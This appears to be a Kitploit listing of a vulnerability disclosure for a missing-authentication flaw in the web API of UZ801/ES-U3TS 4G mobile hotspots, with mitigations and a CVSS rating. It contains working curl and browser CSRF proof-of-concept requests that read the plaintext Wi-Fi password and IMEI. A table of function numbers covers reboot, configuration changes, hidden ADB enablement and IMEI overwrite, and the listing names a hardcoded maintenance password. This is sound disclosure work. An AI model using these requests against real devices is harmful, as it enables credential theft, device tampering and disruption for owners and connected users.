Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-52200 — Security advisory che descrive un controllo degli accessi non corretto nell'API web MifiService di UZ801/ES-U3TS, che consente l'estrazione non autenticata dei dati, la modifica della configurazione e il riavvio del dispositivo. Include PoC e mitigazioni. | Kitploit
Strumenti/GitHubGitHub/lamaper/cve-2026-52200
Sicurezza IoTAnalisi delle VulnerabilitàExploitAudit di ConfigurazioneRaccolta InformazioniSicurezza WebPenetration Testing
GitHublamaper/cve-2026-52200

CVE-2026-52200

Security advisory che descrive un controllo degli accessi non corretto nell'API web MifiService di UZ801/ES-U3TS, che consente l'estrazione non autenticata dei dati, la modifica della configurazione e il riavvio del dispositivo. Include PoC e mitigazioni.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

UZ801 / ES-U3TS MifiService Controllo di Accesso Non Corretto

Advisory di sicurezza e note tecniche per un problema di controllo di accesso non corretto nell'API di gestione web incorporata esposta da MifiService.apk sulla piattaforma Wi-Fi mobile 4G LTE OEM / white-label UZ801_v2.1, commercializzata anche come ES-U3TS.

Questo repository è inteso a supportare la divulgazione coordinata e l'assegnazione CVE. Si concentra su prove tecniche riproducibili e non weaponizzate.

Riepilogo

Il dispositivo interessato espone un endpoint di gestione HTTP basato su Jetty all'indirizzo:

root@kitploit:~
http://192.168.100.1/ajax

Il dispatcher delle richieste backend è implementato in:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

Sebbene l'interfaccia web presenti una pagina di login, il backend non impone una sessione autenticata valida lato server per la maggior parte delle funzioni di gestione. Di conseguenza, un attaccante sulla rete adiacente può invocare direttamente operazioni sensibili funcNo senza autenticazione.

L'impatto verificato include:

  • estrazione della password Wi-Fi corrente in chiaro
  • estrazione di IMEI, informazioni sul firmware, stato SIM e configurazione di rete
  • estrazione della configurazione DHCP e del filtro MAC
  • modifica e persistenza della configurazione di gestione senza autenticazione
  • attivazione del reset della configurazione e del riavvio del dispositivo senza autenticazione

Ulteriori funzioni ad alto rischio sono state confermate tramite analisi statica, tra cui:

  • riavvio nel bootloader
  • abilitazione delle modalità USB ADB / Qualcomm Diag nascoste e riavvio
  • funzionalità non documentata di sovrascrittura IMEI

Ambito e denominazione

L'hardware testato sembra appartenere a una famiglia di dispositivi OEM / white-label. Il fornitore di sviluppo originale esatto è attualmente sconosciuto e non è stato identificato alcun contatto di sicurezza affidabile del fornitore.

Questo advisory utilizza pertanto la seguente denominazione del prodotto:

  • Piattaforma: UZ801_v2.1
  • Alias di marketing osservato: ES-U3TS
  • Firmware osservato: UZ801-V3.4.3
  • App osservata: MifiService.apk
  • Pacchetto osservato: com.mifiservice.hello

Se si scopre che altri marchi o rivenditori distribuiscono lo stesso firmware, APK, risorse web e comportamento funcNo, devono essere considerati varianti probabilmente interessate dello stesso codebase.

Componente interessato

  • Endpoint API Web /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

Causa principale

Non si tratta principalmente di un problema di credenziali predefinite.

La causa principale è il controllo di accesso non corretto nell'API backend:

  • nessuna sessione autenticata lato server è imposta per la maggior parte delle richieste di gestione
  • nessuna protezione CSRF è presente
  • nessuna validazione Origin è presente
  • nessuna validazione Referer è presente
  • nessun cookie di sessione o token è richiesto per la maggior parte delle funzioni sensibili

La funzione di login esiste, ma non fornisce confini di autorizzazione significativi per la maggior parte dell'API di gestione.

Modello di minaccia

Vettore di attacco primario:

  • attaccante sulla rete adiacente connesso all'hotspot del dispositivo

Vettore di attacco secondario:

  • sfruttamento CSRF / drive-by basato su browser contro una vittima attualmente connessa alla LAN del dispositivo

Non si tratta di un attacco remoto esposto a internet per impostazione predefinita. L'attaccante deve:

  • avere raggiungibilità diretta Layer 2 / Layer 3 verso 192.168.100.1, oppure
  • indurre il browser di una vittima connessa a inviare richieste all'endpoint del dispositivo

Stato delle prove

Tutti i risultati di seguito sono inclusi come funzionalità interessate dello stesso problema di controllo di accesso non corretto.
Dove rilevante, ogni elemento è esplicitamente marcato come:

  • Validato dal vivo
  • Confermato tramite analisi statica

Questa distinzione è preservata per accuratezza. Le funzionalità ad alto rischio non sono etichettate come testate dal vivo quando non sono state intenzionalmente eseguite su hardware pubblico.

Risultati tecnici per gruppo di funzioni

Divulgazione di informazioni non autenticata

Modifica della configurazione non autenticata

Azioni amministrative / di disturbo non autenticate

Funzionalità non documentate o di tipo manutenzione

funcNoDescrizioneStatoNote

Stato del fornitore

  • Fornitore upstream originale: sconosciuto
  • Tipo di prodotto: piattaforma router mobile OEM / white-label
  • Contatto PSIRT / sicurezza affidabile: non identificato
  • Stato attuale della divulgazione: fornitore non raggiungibile / nessun canale di sicurezza del fornitore confermato

Al momento della stesura, il dispositivo sembra essere venduto tramite canali OEM / rivenditori con branding incoerente o assente, e non è stato stabilito alcun contatto affidabile con il fornitore di sviluppo originale.

Esempi PoC sicuri

Gli esempi seguenti sono intenzionalmente limitati a validazione di sola lettura o a basso impatto. Sono inclusi per dimostrare la vulnerabilità senza fornire un flusso di sfruttamento weaponizzato.

1. Lettura della password Wi-Fi corrente senza autenticazione

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

Comportamento atteso:

  • restituisce JSON
  • include ssid
  • include pwd in chiaro

2. Lettura delle informazioni identificative del dispositivo senza autenticazione

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

Comportamento atteso:

  • restituisce JSON
  • include imei
  • include fwversion

3. Dimostrazione di accesso in scrittura persistente non autorizzato utilizzando un campo a basso rischio

Lettura della lingua corrente:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

Impostazione della lingua:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

Ripristinare il valore originale successivamente.

4. Concetto CSRF basato su browser

Questo endpoint non impone stato di sessione né validazione Origin / Referer. Il browser di una vittima connessa può quindi essere abusato per inviare richieste in background.

Pagina dimostrativa minima:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

Questo esempio è intenzionalmente limitato a un numero di funzione di sola lettura. Non distribuirlo contro utenti o dispositivi di produzione.

Formati di richiesta non pubblici / ad alto rischio

I seguenti formati JSON sono documentati solo per analisi difensiva e triage. Non sono accompagnati da passaggi di esecuzione qui.

2001 - abilitazione interfacce di debug nascoste

root@kitploit:~
{"funcNo":2001}

Comportamento osservato nel codice:

  • esegue setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • esegue sync
  • riavvia il dispositivo

2004 - percorso di sovrascrittura IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<valore-testo-redatto>"}

Comportamento osservato nel codice:

  • chiama un percorso equivalente a AT+WRIMEI=<valore>
  • verifica il successo tramite un percorso di rilettura IMEI successivo

Nessun test pubblico dal vivo è incluso qui per motivi legali, di conformità e di integrità del dispositivo.

Estratti di prova

Esempio di risposta non autenticata per 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Esempio di risposta non autenticata per 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Perché questo è un candidato CVE

Questo problema è un forte candidato CVE perché:

  • è riproducibile su un dispositivo controllato dal cliente
  • è raggiungibile da un attaccante sulla rete adiacente
  • non dipende da modifiche fisiche non documentate
  • non è semplicemente un problema di password predefinita
  • ha impatto su riservatezza, integrità e disponibilità

Classificazione suggerita:

  • CWE-306 Autenticazione mancante per funzione critica
  • CWE-862 Autorizzazione mancante

CVSS suggerito:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Stato della divulgazione

  • Analisi statica completata: 2026-05-11
  • Validazione dal vivo completata: 2026-05-12
  • Preparazione contatto fornitore completata: 2026-05-12
  • Bozza advisory pubblico preparata: 2026-05-12

Mitigazioni

  • richiedere una sessione autenticata valida lato server per tutte le funzioni di gestione
  • rifiutare tutte le richieste funcNo sensibili senza autenticazione
  • aggiungere protezione CSRF
  • validare Origin e Referer
  • rimuovere gli endpoint di manutenzione non documentati dalle build di produzione
  • non esporre mai le credenziali Wi-Fi tramite risposte API non autenticate

Avviso legale e di sicurezza

Questo repository è inteso per ricerca difensiva, divulgazione di vulnerabilità e coordinamento. Gli esempi pubblici sono intenzionalmente limitati a validazione a basso rischio. Le funzionalità ad alto rischio sono documentate solo nella misura necessaria per la remediation e il triage CVE.

Scarica lo strumento
funcNoDescrizioneStatoNote
1002Legge SSID, IP del dispositivo, DNS, password Wi-FiValidato dal vivoRestituisce la password Wi-Fi in chiaro
1009Legge modalità di crittografia Wi-Fi e passwordValidato dal vivoRestituisce la password Wi-Fi in chiaro
1011Legge intervallo DHCP, DNS, elenco clientValidato dal vivoUtile per la ricognizione locale
1015Legge stato SIMValidato dal vivoRestituisce lo stato SIM
1029Legge IMEI, firmware, produttore, informazioni sul segnaleValidato dal vivoRestituisce l'identità sensibile del dispositivo
1052Legge modalità filtro MAC e voci configurateValidato dal vivoEspone policy e slot configurati
2002Legge slot SIM attivoValidato dal vivoEspone lo stato di runtime
funcNoDescrizioneStatoNote
1004Modifica modalità di connessioneConfermato staticamenteNessuna imposizione di sessione osservata
1005Modifica modalità di rete preferitaConfermato staticamenteElevato impatto operativo
1007Modifica SSID / numero massimo di stazioniConfermato staticamentePersiste la configurazione e riavvia la logica AP
1010Modifica modalità di crittografia Wi-Fi / passwordConfermato staticamenteElevato impatto sulla riservatezza
1012Modifica impostazioni DHCP/DNSConfermato staticamenteManomissione della rete locale
1016/1017/1018Lettura / impostazione / commutazione profilo APNConfermato staticamenteModifica del comportamento WAN
1031Modifica lingua e persistenzaValidato dal vivoUtilizzato come prova a basso rischio di accesso in scrittura
1053/1054/1055Modifica comportamento filtro MAC e vociConfermato staticamenteManomissione del controllo di accesso alla rete
funcNoDescrizioneStatoNote
1013Riavvio del dispositivoValidato dal vivoDoS / interruzione del servizio
1014Reset configurazione app/rete e riavvioValidato dal vivoNon è una cancellazione completa dei dati utente Android
2000Riavvio nel bootloaderValidato dal vivoElevato impatto operativo
2001Abilita configurazione USB ADB/Diag nascosta e riavvioConfermato staticamentePercorso di manutenzione pericoloso
2003Percorso password di manutenzione nascostoConfermato staticamenteUtilizza admin8888 hardcoded; il comportamento appare parziale / residuo
2004Sovrascrittura IMEIConfermato staticamenteChiama il percorso comando AT; non eseguito pubblicamente